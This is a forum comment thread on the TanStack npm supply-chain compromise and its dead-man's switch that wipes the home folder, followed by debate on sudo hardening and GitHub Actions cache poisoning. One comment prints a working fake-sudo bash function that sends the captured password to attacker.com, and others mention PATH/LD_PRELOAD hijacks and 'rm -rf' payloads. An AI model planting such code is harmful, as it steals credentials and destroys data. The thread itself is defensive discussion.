Postmortem: TanStack NPM supply-chain compromise

5/11/2026 at 10:18:46 PM

Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor(macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/.

https://github.com/TanStack/router/issues/7383#issuecomment-...

by cube00

5/12/2026 at 12:06:05 AM

Realistically if you have installed malware, you need to do a full wipe of your computer anyway.

by Gigachad

5/12/2026 at 12:37:37 AM

[On Linux:]

If you didn't give yourself "free" (passwordless) sudo, that's not necessary…

…unless it happened in a week with 2 and a half Linux kernel LPEs.

by eqvinox

5/12/2026 at 1:10:06 AM

Sudo is security theater.

Malware can make a fake unprivileged sudo that sniffs your password.

function sudo () {

    realsudo=$(which sudo);

    read -r -s -p "[sudo] password for $USER: " password;

    echo "$USER: $password" | \

        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;

    $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;

    $realsudo "${@:1}";

}

by lrvick

5/12/2026 at 2:12:19 AM

> Sudo is security theater.

Yes indeed.

> Malware can make a fake unprivileged sudo that sniffs your password.

Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.

Only way to log in at root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by login in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only with using U2F/Yubikey... I have to as it's the only real way to log in as root).

It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).

Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.

That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.

I did set that up just because I could. Turns out it's fully usable so I kept using it.

Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.

by TacticalCoder

5/12/2026 at 3:44:04 AM

This thread was kicked off by somebody who said:

> Realistically if you have installed malware, you need to do a full wipe of your computer anyway

You might be the exception to this sentiment. But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).

by bee_rider

5/12/2026 at 5:02:56 PM

> But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).

Oh no, I'd still nuke everything from orbit should I find anything indicating a local exploit succeeded. But the thing is: if on one system a local exploit has less probability to give root, then the probability that on that same system I'd know I need to nuke everything from orbit would be higher than on a system where root is easier to obtain.

I was however answering to the part about subverting sudo: and I both agree (it's totally trivial to abuse sudo) and disagree ("everybody uses sudo") with the part about sudo.

by TacticalCoder

5/12/2026 at 6:05:49 PM

I agree. My surreptitious goal was to emphasize to anyone reading along: this person has put in the extra effort, but even they will not try to recover a compromised system. It is just too risky.

by bee_rider

5/12/2026 at 2:49:43 AM

In my case I use QubesOS so sudo is useless even if present since every security domain is isolated by hypervisor.

For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.

by lrvick

5/12/2026 at 2:27:51 AM

Thanks for sharing this, that seems like a very cool setup. I have a very old good-for-almost-nothing laptop that would be perfect for this, might just have to copy you!

by jcgrillo

5/12/2026 at 3:56:15 AM

FYI, in English the phrase "since years" is grammatically incorrect and sounds unnatural to a native speaker's ears. The correct phrase would be "I've been using that setup for years."

/aside

by nozzlegear

5/12/2026 at 5:27:15 AM

Yeah, a "seit Jahren" flashed through my mind as I read it.

by sufficientsoup

5/12/2026 at 5:05:00 PM

> The correct phrase would be "I've been using that setup for years."

Oh TYVM. Native french speaker here so it'd be the literal translation of: "depuis des années".

Weird thing is I'm pretty sure I've read it written like that... for years ; )

by TacticalCoder

5/12/2026 at 11:09:16 PM

No problem! If it weren't for that one phrase I would've thought you were a native speaker, your English is very good.

by nozzlegear

5/12/2026 at 6:05:10 PM

I hear it from many native speakers. The deliberate incorrectness is a sort of cutespeak. "Since... years".

I can't stand l33tspeak but in this case I think the kids can stay on the lawn.

by stickfigure

5/12/2026 at 11:05:45 PM

I don't think I've ever heard a native speaker say it, but I could definitely imagine it coming out of a native speaker's mouth with that pregnant pause, specifically. Like an acknowledgment that you're about to say something a bit grammatically awkward.

I only mentioned it because I used to think correcting people's English was rude, until I had a long work engagement with a French guy whose English was pretty good but not quite native. He insisted that I correct his written English if I saw a mistake (i.e. in documentation, proposals, etc.), otherwise he wouldn't learn where it was wrong and how to improve it.

by nozzlegear

5/12/2026 at 5:27:30 AM

I've heard this often enough from English speakers from India that I think it is accepted grammar in that region.

by kaonwarb

5/12/2026 at 6:35:21 AM

To my ears it “since years” sounds like it’s missing an “ago” after it (or like the GP said “for years” sounds even more natural).

It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"

To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).

by lemoncucumber

5/12/2026 at 8:28:54 AM

Is the meaning different? I'm struggling to see how "from September 20th" would have a different implication to "starting from September 20th" (or similar) given the context.

by regularfry

5/12/2026 at 3:18:01 PM

The meaning is the same, it just sounds weird to my ears in the same way that “since years” does

(Also I just noticed the extra “it” in my previous comment, oops).

by lemoncucumber

5/12/2026 at 8:13:20 PM

Are root logins only allowed from that particular LAN? Because ssh localhost is a thing.

I would say that the inability to obtain a session with elevated privileges from a normal session is key. The problem with sudo is that it gives the same shell some superpowers, so it's exploitable. Even ssh might be impenetrable, if not for the /dev/<pid>/fd of the ssh invocation, and even that can only read.

by nine_k

5/12/2026 at 3:07:33 PM

>but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option

My phone password is that long, we’re still only talking about taking a few seconds to enter it when sober.

Most people will quickly develop the necessary muscle memory in regular use.

by walletdrainer

5/12/2026 at 4:14:15 AM

tell us about your disk encryption setup. and do you use secureboot?

by aiscoming

5/12/2026 at 9:12:35 AM

Why disallow password login when you have 30 char password?

by GoblinSlayer

5/12/2026 at 5:09:18 PM

> Why disallow password login when you have 30 char password?

I only disallow password login over SSH. It's still technically possible to log in at a virtual console (like tty1 / tty2 / etc.) using a password (btw only root has a 30 characters password).

Usually you do not allow to directly log in as root by SSH: but in my case it's basically the way I want it done. So I allow root to log in by using SSH but only with a Yubikey.

by TacticalCoder

5/12/2026 at 6:31:36 AM

When you update your packages, are you using that ssh laptop?

by WesolyKubeczek

5/12/2026 at 10:01:53 PM

You don't even really need that; you just need to wait until the user runs `sudo` and then you also run `sudo` after they authenticate. Now you're root, boom. It doesn't get you the password, but once you're root you can backdoor to your heart's content and then you probably don't need it.

Alternately, run `sudo --non-interactive --validate` over and over until it succeeds. For some reason, using noninteractive doesn't log to the auth log/journald the way trying and failing to actually run a command would.

Edit: the loop only works assuming you can run this sudo command in the background in the user's shell so that you can pick up the same sudo session when they auth, which is honestly unlikely. Easier to wrap sudo in a command that just also runs sudo and then immediately runs something else.

by danudey

5/12/2026 at 6:30:02 AM

Use /usr/bin/sudo yourcommand with any intermediate command not using path but it's real path hard coded.

Edited: Previous suggested using \sudo but it depends of the variable path which can be modified by the attacker.

by sinsudo

5/12/2026 at 8:52:36 AM

Yeah, works well:

$ /usr/bin/sudo() { echo Not the real sudo.; }

$ /usr/bin/sudo

Not the real sudo.

And every other suggestion also doesn't work if the attacker can just replace the shell.

by throwaway7356

5/12/2026 at 10:37:46 AM

/usr/bin/sudo isn't evaluated as a function under ksh.

by anthk

5/12/2026 at 2:16:19 PM

> And every other suggestion also doesn't work if the attacker can just replace the shell.

by nightpool

5/12/2026 at 10:43:06 PM

With what? rc? My only shells are sh, ksh and rc there.

by anthk

5/12/2026 at 7:40:34 AM

Ok, so the malware runs a keylogger / clipboard logger, gets the password and runs sudo on it's own. Or replaces your shell by putting exec ~/hackedbash into your bashrc

Password on sudo is only useful if you detect the infection before you run sudo

by exyi

5/12/2026 at 7:50:52 AM

Could link it to a yubikey via pam.d so you need a fingerpress to authenticate.

by fragmede

5/12/2026 at 8:22:28 AM

Physical attestations are hard to solve, I think it would be nice if all TPMs in laptops had this. Then the problem becomes how do you automate stuff that needs to be done.

by pastage

5/12/2026 at 3:55:29 PM

At least my password won't leak as often with yubikey, but the attacker can still hack my shell to execute fake sudo. Even if I type /bin/sudo explicitly, there is ptrace, LD_PRELOAD or just replacing the entire bash binary.

In practice yubikey sudo keeps you much safer today, as almost nobody uses it and malware won't be prepared for it

by exyi

5/12/2026 at 8:40:16 AM

And then the moment you authenticate, the fake sudo still executes its payload.

Yubikeys do not fix this issue.

by lrvick

5/12/2026 at 6:53:34 AM

Yes, that would be one potential solution. But I have certainly never done it and bet >99.999% of the world's use of sudo is through 'sudo'.

Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.

by mort96

5/12/2026 at 7:08:14 AM

The real problem is that there should be at least 2 levels for sudo, one for installing software and another that really allows someone to compromise the entire system, both layers should be separate to mitigate risk. At least the most secure layer should allow you to perform secure recovering and diagnosis

by sinsudo

5/12/2026 at 8:11:58 AM

Unix used to have a user named "bin" just for owning all the binaries and performing installs.

by DonHopkins

5/12/2026 at 8:31:06 AM

The old bin user is an idea that could be modernized with a new two level sudo concept, the higher one for recovery and diagnosis, already done in Chromebook and other solutions

by sinsudo

5/12/2026 at 10:21:02 AM

bin passwords I will always remember: At the University of Maryland CS department systems the bin password was "fuck,you", and there was a devout Christian student on staff who had a problem with that, so we had to change it (to something harder to remember, I just can't recall).

by DonHopkins

5/12/2026 at 8:43:04 AM

You do not need sudo for installing software. Can just install to ~/.local.

Many package managers require sudo, sure, but there is no good reason for them to in a modern linux system, and not all require this.

Even with systemd, you can use systemd --user.

by lrvick

5/12/2026 at 8:57:57 AM

That depends on what the software is. If you want to run a service that bonds to a privileged port for example, you need sudo.

by michaelmior

5/12/2026 at 10:07:13 AM

If you set the appropriate linux capabilities flag on a binary such as sshd at bootup then unprivileged users can bind to 22, no problem.

setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd

Could even run it as a daemon unprivileged from a home directory with "systemd --user"

That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.

by lrvick

5/12/2026 at 2:57:13 PM

How do you setcap without root?

by mort96

5/12/2026 at 6:19:57 PM

The way many including me manage systems without root privileges at runtime is by compiling immutable rootfs images that run in ram with kernel, init, mounting filesystems and assigning any users and privilege assignments, then drop to user privs.

That stuff needs to change very seldom, so when you do need to change it you just generate a new tiny rootfs image in a few seconds and reboot to pivot to it or maybe have a kexec trigger if you are feeling fancy.

For my primary workstation the entire disk is my home partition and I boot my latest rootfs from a flash drive. In other cases network boot.

by lrvick

5/12/2026 at 10:08:56 AM

For that you really only need CAP_NET_BIND_SERVICE.

The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.

by zrm

5/12/2026 at 10:04:26 AM

For most things, you can do with capabilities

Issue is that it increases friction and you need sudo anyways to set the capabilities.

Most web servers would happy to run unprivileged with only CAP_NET_BIND_SERVICE

by signed-log

5/12/2026 at 10:17:41 AM

More than just two levels for sudo, the Linux permission model is completely broken for this very reason. (Also see: https://xkcd.com/1200/)

Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)

by DaSHacka

5/12/2026 at 9:36:49 AM

Surely if malware has rw access to the home folder, it can adjust the env variables / shell to make this also fake.

by ChocolateGod

5/12/2026 at 7:45:57 AM

Why not make a proper link /sudo so you don't have to type out the full path every time, which is very inconvenient? (but the fact that such workarounds are needed still means it's a theater)

by eviks

5/12/2026 at 8:45:27 AM

A simple LD_PRELOAD command can cause your shell to run "rm -rf /" when you type "/sudo".

If your unprivileged user is compromised, you are pretty hosed.

by lrvick

5/12/2026 at 10:43:51 AM

It should be a way to make system env vars (profile.d or simlar) as readonly so every users' shell had these set to empty values and unable to change them.

by anthk

5/12/2026 at 10:54:01 PM

Shell-only, but https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V...

by marshray

5/13/2026 at 7:32:01 AM

Yes; I'm aware, but for some environments writting a custom shell as the one for SDF would be an easier task. Or maybe a really restricted "ash" called "rash" -because it is- with maybe autocomplete and that's it. Hardcoded $PATH and the like.

by anthk

5/12/2026 at 8:34:02 AM

Anything that can be modified by an attacker can not be used to secure the sudo command. This is a recursive requirementor hierarchy for secure systems.

by sinsudo

5/12/2026 at 9:23:31 AM

You can set the permissions so that the attacker can't modify it?

by eviks

5/13/2026 at 12:10:39 PM

You would need to prevent an attacker from installing shell aliases, or shell config files, or altering any binaries in PATH.

Like, sure you could, but you end up with a very useless system.

Easier to just use VMs for each security context.

by lrvick

5/13/2026 at 12:14:25 PM

Is any of this specific to a link vs tyre original full-pathed sudo?

by eviks

5/12/2026 at 8:39:55 AM

Stupid thought.

Make alias called sdo that echoes sudo path and hash every time you use it to stderr.

That's security by obscurity though.

by xlii

5/12/2026 at 9:55:57 PM

I mean, this is basically why you press Ctrl-Alt-Del to log in on Windows NT and Win2k - because it's a keystroke that malware couldn't trap, so they can't put up a fake login screen because the OS will override it anyway.

by danudey

5/12/2026 at 10:25:26 PM

There was no hardware or other low-level magic associated with C-A-Del.

Back in the NT days malware could totally intercept it, but it would have had to be in the kernel. Which was something of an improvement.

Thank you, DoD Orange Book.

by marshray

5/12/2026 at 8:16:38 AM

It would be great if

1. shells support the notion of privileged commands, that can't be overridden with PATH manipulations, aliases or functions.

2. Sudo (or PAM actually) can authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff and you can also use 2FA or passkeys.

by FooBarWidget

5/12/2026 at 8:55:11 AM

Fish shell has builtin[1], although sudo is not one of the commands it covers.

[1] https://fishshell.com/docs/current/cmds/builtin.html

by ctippett

5/12/2026 at 10:12:25 AM

Neither would actually help in this case though. Malware could manipulate both of those as an unprivileged user to run malicious code the next time you elevate privileges.

Remember that malware can replace or modify your shell

by lrvick

5/12/2026 at 12:06:15 PM

No? The shell must be listed in /etc/shells, it can't be an arbitrary command. And after elevating privileges you have to run the malware (which could only be written to home or tmp) for it to work, but sudo already scrubs the environment.

So the main danger is that you're not running the real sudo.

I have an idea that I hope to implement one day to make sudo actually secure:

1. Authenticate with passkeys (webauthn) instead of passwords.

2. Sudo can only run an interactive root shell, not arbitrary commands. The session is time-bound, and the TTY output is recorded for auditing purposes.

This combination makes intercepting sudo largely useless. Passkey authentication cannot be replayed or relayed. The fact that sudo can only open an interactive shell makes it impossible for a sudo wrapper to pass a malicious to sudo. This way we're not dependent on whether the unprivileged shell is secured properly. It also solves approval fatigue (compared to running sudo separately for every command).

----

EDIT: now that I think about it: an attacker can still edit .bash_profile and reexec the shell in a malicious terminal emulator. Then when the user gets a sudo root shell, the malicious terminal emulator can inject malicious commands.

Looks like the only good way is to get a root privileges via a separate user account that doesn't have malware, and that also can't easily install malware (e.g. accidentally running npm, forgetting that that's not safe).

by FooBarWidget

5/12/2026 at 1:32:23 AM

To clarify, when does this run? Like you download malware A, run malware A and this function definition changes sudo for it, or sudo for other cases?

by nazcan

5/12/2026 at 1:38:25 AM

This could for instance be injected into your .bashrc when you do an "npm install" of a package that has a deeply nested supply chain attack.

Then the next time you run sudo, phase2 triggers installing a rootkit, etc.

by lrvick

5/12/2026 at 1:57:17 AM

Or you could also hijack it using $PATH search order with your wrapper to get existing terminal sessions too, there's a lot of ways to skin that cat.

by arcfour

5/12/2026 at 2:09:10 AM

Endless ways, which is why I do not understand why sudo is ever used anymore, especially in production.

You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.

by lrvick

5/12/2026 at 3:34:55 AM

I dont mean to be snarky, can you run `pacman -Syu` without root with "new" tech? Or do you mean in general on production systems or whatever?

by GCUMstlyHarmls

5/12/2026 at 8:47:03 AM

Plenty of package managers can install to an arbitrary directory like ~/.local. Each user, or even each project, can have its own rootfs full of software.

The only things I tend to have running at the system level are a kernel and init and maybe openssh.

by lrvick

5/12/2026 at 2:15:20 AM

That is one of many reasons to keep your dotfiles under version control.

by Ferret7446

5/12/2026 at 2:46:23 AM

Someone that can wrap your sudo binary can wrap you git binary too. Once your OS is compromised all bets are off.

by lrvick

5/12/2026 at 2:26:07 AM

How would that help? Unless you happen to check the dotfiles git diff before running _anything_. I guess this could be put in prompt or some cron job to detect diffs but I bet absolutely nobody does this.

by lpribis

5/12/2026 at 4:47:34 AM

sudo don't acccept password from stdin. it takes a tty

by j16sdiz

5/12/2026 at 4:56:21 AM

https://superuser.com/questions/67765/sudo-with-password-in-...

by dymk

5/12/2026 at 8:08:35 AM

Just sudon't.

by DonHopkins

5/12/2026 at 1:49:29 AM

[dead]

by nullsanity

5/12/2026 at 12:44:12 AM

On linux realistically whatever user you installed the malicious NPM package with has access to everything you care about anyway.

by Gigachad

5/12/2026 at 9:53:40 AM

I had an idea to always run 2 users, the "main" one (or more) and a "project one"... one could sudo to the project user, but that one could not sudo out... (npm would only be installed for the project user).

by silon42

5/12/2026 at 1:40:17 AM

Every user, since privesc is so easy on most operating systems.

by lrvick

5/12/2026 at 1:42:13 AM

Sure, without exploits they can steal your api keys, read your personal data, and access your browser data. With exploits they can update packages on your computer too.

by Gigachad

5/12/2026 at 2:45:30 AM

No exploits needed. A simple shell alias will suffice. See my example in sibling comment.

by lrvick

5/12/2026 at 1:00:43 AM

Until it overrides sudo in your $PATH to install malware after you enter your password later.

by lights0123

5/12/2026 at 9:40:47 AM

Any application running as a user with sudo access and RW permissions on the users home folder effectively has root permissions, it'll just take a little longer to get it.

That's why Flatpaks sandbox doesn't exist if the application has access to the home folder.

by ChocolateGod

5/12/2026 at 3:00:59 PM

Next easy attack vector is (non-rootless) docker run with rootfs mount, many are in docker group even when sudo is protected. Also, most sensitive data is in the user scope anyways (on a PC).

You should always run dev stuff in containers to start with. And when your system is compromised, reprovision from a higher scope, too many places to hide backdoors

by kro

5/12/2026 at 2:52:48 AM

There a million ways that malware can persist without root.

by WatchDog

5/12/2026 at 4:50:04 PM

And I'm increasingly concerned that one could vibe-code a massive payload that does all of these at once - including subtle things like trying to get itself installed into personal projects and forks, so it can persist across a system wipe. We're only seeing the beginning of these attacks.

by btown

5/12/2026 at 1:19:43 AM

There numerous ways to root Linux over the decades

by stogot

5/12/2026 at 12:39:40 AM

You should assume other LPEs exist though

by dgellow

5/12/2026 at 7:12:24 AM

What leads people to believe things like this?

by walletdrainer

5/12/2026 at 11:13:23 AM

It’s like if a bandaid fell into the soup pot. You could solve the problem by (A) fishing it out and giving the soup a good boil; or (B) new soup please!

by gorgoiler

5/12/2026 at 12:51:51 AM

It's the "nuke it from orbit" approach but "the only way to be sure".

by sigzero

5/12/2026 at 2:35:01 PM

Yeah, this is pretty good devex from the hackers.

by antihero

5/12/2026 at 4:14:46 AM

you're gonna need the infected device as is for forensics

by nsonha

5/11/2026 at 10:37:54 PM

I don't understand why people were voting this comment down in the issue page

by meander_water

5/11/2026 at 11:27:57 PM

Maybe they have a non-standard interpretation of thumbs-down – as "thumbs-down to this fact" not "thumbs-down to you for pointing it out"

by skissane

5/12/2026 at 1:05:37 AM

I have noticed this behaviour happening more often too, it's very confusing. Usually when texting with younger Gen Z people.

by hmokiguess

5/12/2026 at 2:36:14 AM

This has always been happening

by efilife

5/12/2026 at 4:58:50 AM

We lived through a generation of agism at millennials and now we're turning around and doing it at Gen Z. It's unbelievable.

by Griffinsauce

5/13/2026 at 1:11:38 PM

the history repeats itself approximately every 20 to 33 years!

by bpavuk

5/12/2026 at 4:35:51 AM

When you only have eight emoji reactions to choose from, people are bound to get creative in how they use them.

by thayne

5/12/2026 at 8:42:45 AM

Or they're from Eridian.

by matsemann

5/12/2026 at 3:48:00 PM

amaze amaze amaze

by ge96

5/12/2026 at 3:23:30 AM

We need a new emoji for: the situation is lame and the poster is correct. Like a combination of thumbs-up+frown

by edoceo

5/12/2026 at 5:12:53 AM

is not bad for that. Not precise, but in the ballpark.

by __david__

5/11/2026 at 10:47:22 PM

bots.

the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.

yes, a cheap parody on Hofstadter's law, but that's how bad it is

by bpavuk

5/11/2026 at 11:17:29 PM

[dead]

by sieabahlpark

5/11/2026 at 11:31:06 PM

There is no such thing as please be careful when revoking tokens. What does that mean? Dont revoke them? Look at them carefully before revoking them?

And what? Just let the actor just keep using them to spread to other people?

Always rotate your tokens immediately if they're compromised.

If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.

A fair comment would have been: “it looks like the payload installs a dead-mans switch…”

Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.

by noodletheworld

5/11/2026 at 11:35:42 PM

You seem to be interpreting "please be careful when..." as "don't". I'm not sure how that interpretation makes any sense. Obviously they just mean, first kill the service (or better yet, shutdown the machine entirely) and then revoke the token...?

by wavemode

5/11/2026 at 11:46:37 PM

my understanding is that careful means cleaning up the dead-man’s switch before revoking

by yuzuquat

5/12/2026 at 10:14:37 AM

Here being careful about revocation means:

Make sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.

Check for the dead-man switch, and if present, disarm it.

Only then revoke the tokens. Instead of immediately revoking the tokens, like one would normally do. Nobody is suggesting to keep the compromised tokens active longer than necessary.

by CodesInChaos

5/12/2026 at 6:42:13 AM

Did you miss the part about the script that nukes your home folder?

by mosen

5/11/2026 at 11:20:42 PM

Incredible. Mutually assured destruction.

The next five years are going to be truly WILD in the software world.

Air-gapped systems are gonna be huge.

by dcchambers

5/12/2026 at 12:16:24 AM

Maybe just ai-gapped.

by NSUserDefaults

5/12/2026 at 12:33:20 AM

Is that an offhanded joke on the terminology or do you actually mean something? I can't tell.

by eqvinox

5/12/2026 at 3:45:20 AM

I'm not quite sure of what this really accomplishes, like is it just M.A.D.? Like at that point the creds have been stolen and the whole machine is toast.

by corvad

5/12/2026 at 5:30:55 AM

The point is to dissuade mass token revocations.

Let's say the attack becomes hugely succesful and the worm spreads to thousands of devices. GitHub/NPM could just revoke all compromised tokens (assuming they have a way to query) stopping the worm in its tracks. But because of the Dead Mans Switch, they'd know that in doing so, they'd be bricking thousands of their user's devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en-masse, to each individual who got compromised, greatly improving the worm's chances of survival.

by avaq

5/12/2026 at 3:55:39 PM

brilliant. thank you for that.

by frikk

5/12/2026 at 4:06:23 AM

Even after the owner has realized the attack and revoked the token, there’s next steps (alerting the community, pulling from NPM) that causing havoc delays even by just a bit.

by dominicm

5/12/2026 at 2:22:28 PM

Sounds like MSFT should update the WAF to look for this polling and just return 200 or some other code until resolved, then cycle the tokens.

by k33P1Tr3aL

5/11/2026 at 10:31:24 PM

if so, then this is actual terrorism of the software world!!

by bpavuk

5/11/2026 at 10:43:01 PM

Only if the goal is to actually spread fear in a civilian population. It's not clear what the motivation is here besides "the worm spreads itself lol".

by embedding-shape

5/11/2026 at 10:45:20 PM

that dead man's switch surely smells like that tbh

by bpavuk

5/11/2026 at 11:20:50 PM

The dead man's switch reminds me of worms and viruses from my childhood, whose primary purpose was apparently just to wreak havoc rather than direct financial gain. It's a childish gimmick.

by isityettime

5/11/2026 at 11:37:38 PM

If an infected computer gets disabled after deactivating one stolen credential, it might slow down the victim from deactivating their other stolen credentials.

by resonious

5/11/2026 at 11:59:41 PM

Ugh. True.

by isityettime

5/12/2026 at 10:21:41 AM

> as a systemd user service

Hah! I know why I don't use systemd.

by shevy-java

5/12/2026 at 1:36:22 PM

> I know why I don't use systemd

Could just as easily install it in your user's crontab though?

by petcat

5/11/2026 at 10:29:29 PM

One should always have had backups configured, but if this is what gets people to setup backups, so much the better.

by fragmede

5/12/2026 at 12:34:35 AM

Sure. But even restoring from backup means a cost is being inflicted, and not a small one.

by eqvinox

5/12/2026 at 9:50:32 AM

What I want to focus on is mental model of your CI pipeline, and problem with too much YAML, consider this quote:

> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.

This is very difficult to understand, and teach to new people, because everything is configured as YAML, yet everything is layed out in the background to directories and files.

What if your CI pipeline was old-school bash script instead? This would be far more obvious to greater amount of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.

Could we go back to basics and manage pipelines as scripts and maybe even run small server?

by Ciantic

5/12/2026 at 2:59:38 PM

> What if your CI pipeline was old-school bash script instead?

It doesn't matter if the cache is accessed through `actions/cache` in YAML or `curl -X POST $GITHUB_CACHE_URL < wololo.exe` or whatever. The fundamental problem is that "cache scope is per-repo."

I cannot fathom why they chose to support this at all, let alone make it the default for any action trigger. Any writeable data should be scoped to users/groups and require credentials. It should be impossible to write to a shared cache without explicitly granting permissions to the user triggering the action.

And sure a PAT might leak through an env var not configured through secrets, but that's an understandable issue created by the user. I think most people are surprised their caches are world writeable with an innocuous actions trigger.

by duped

5/12/2026 at 3:21:39 PM

If I saw this in my CI script:

    curl -X POST $GITHUB_CACHE_URL < wololo.exe

It would make me pause, but now that it is a misfeature in YAML configuration it is more widely used. Point of bash scripts they are auditable, and understandable.

I didn't prescribe what the bash script would be, because it would differ on use case. If I wanted to share artifacts from other runs I would probably use podman and make sure I start new runs from known good condition, but because I understand that. Some other would use nix or whatever else.

by Ciantic

5/12/2026 at 5:28:19 PM

The fundamental problem is that on Github Actions it's possible to give read-only permissions to pipelines that are then violated because runners can be granted read+write permissions to the cache. And they don't consider this a P0 bug.

So you don't even need to see questionable bash scripts to know there's a problem. The script would have already completed and pwned you by the time you see it.

With podman or nix you would have to poison the container registry/nix store which is more difficult, but you're also probably using your own runners.

My point though is that it's not bash or yaml here, but Github's default access controls. If you own your own runners and your own caching layer then you're not going to be nearly as boneheaded as Github here. But Github pushes people towards their integrated solutions, which have horrible defaults.

by duped

5/12/2026 at 1:06:57 PM

This is a problem with all of devops imo - everything is a magic yaml config file and they're very difficult to debug or reason about unless you _just know things_.

by daemonologist

5/12/2026 at 3:20:50 PM

Because most modern development practices assume you work at a trillion dollar corporation and can subsidize very poor unscalable business practices. It's baffling, especially when modern solutions are worse at making maintainable software not better IMO.

by shimman

5/12/2026 at 3:32:37 PM

Agree. It's unfortunate that people new to development are encouraged to embrace practices that large teams in big companies have had to adopt. It might make sense for career development, but it makes for a miserable development experience, especially for someone new to it, wanting to build something for themselves. No joy in it.

by k1m

5/12/2026 at 10:52:43 AM

The other advantage with bash is that most developers can run it locally to validate what it is doing and debug issues. With GitHub Actions you need to always commit and push, slowing down the DX.

by SamuelAdams

5/12/2026 at 6:07:48 PM

Shameless plug: solving this "push and pray" problem is something we have been focusing on with Dagger. It's an open-source CI platform that decouples the runtime from the triggers. The runtime is open source and local-first, so you develop the actual logic of your pipelines with a proper dev loop. Then, you separately wire up your git triggers. The same pipeline logic can be triggered locally or from git events.

IMO this is the only clean way to solve the problem. If you want to check it out and share feedback: https://dagger.io . We also have a very active Discord server full of CI nerds.

by shykes

5/13/2026 at 2:07:40 AM

Yep, I tried to use Act to get a sense of what our YAML was doing but it failed to pull the docker images and I gave up - not enough incentive to test locally when I can push to GH and yolo it and hope the ops folks can help me figure it out

by phatskat

5/12/2026 at 3:21:30 PM

Commit, Push, & Pray.

by nefarious_ends

5/12/2026 at 12:02:29 PM

Fully agree. I was very confused trying to understand the attack.

There are so many things involved that a casual user will never get security right. Even if you are knowledgeable it's very draining if you have to catch up, securing all your workflows is hard work that is definitely NOT done at a glimpse and you probably postpone it because of that.

If you have some sense for security you will usually get nervous doing something stupid in a bash script. Well, except you bury everything in thousands of abstractions.

by Yokohiii

5/12/2026 at 10:24:14 AM

Not sure cases like the cache poisoning here would be more obvious.

Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.

by LelouBil

5/13/2026 at 2:07:54 PM

This isn't true.

Our old jenkins hosts were largely forever instances with forever credentials that were just waiting to take down the org.

Modern pipelines are orchestrates that run ephemeral execution environments with ephemeral credentials that can significantly decrease the impact and timescales of getting pwned.

They're not perfect, but you can get pretty good posture by applying expertise to the subject. The problem, like always, is this expertise is neither valued nor rewarded.

by ownagefool

5/12/2026 at 10:22:40 AM

https://noyaml.com

by ryanschaefer

5/12/2026 at 5:56:42 PM

The core issue is that the lang is horrible to get to compile in a reasonable amount of time on a build server. Then since the way it is designed it is bad at caching. That is why you have this "optimistic" caching to begin with.

Our solution is to build everything in Docker. Which is about what you suggest since it does not automatically share cache between branches. But it is slow.

by AtNightWeCode

5/12/2026 at 11:29:08 AM

I like a lot about nix, and this is one of those things: built derivations are addressed by the hash of their inputs: without changing something about the inputs, you (barring bugs) cannot get an incorrect or poisoned cache artifact

by mplanchard

5/12/2026 at 11:01:08 PM

Without caching, you build and rebuild and rebuild the same things over and over.

With caching, a less strictly managed stage, such as a routine PR build, can affect high-stakes stages such as production builds. But if your builds are reproducible, and dependencies pinned, it should not make a difference.

Old-school scripts have the disadvantage of being slower than a more nice declarative approach, be it makefiles or docker build. Both provide a way to trace the build process in detail; observability is key.

by nine_k

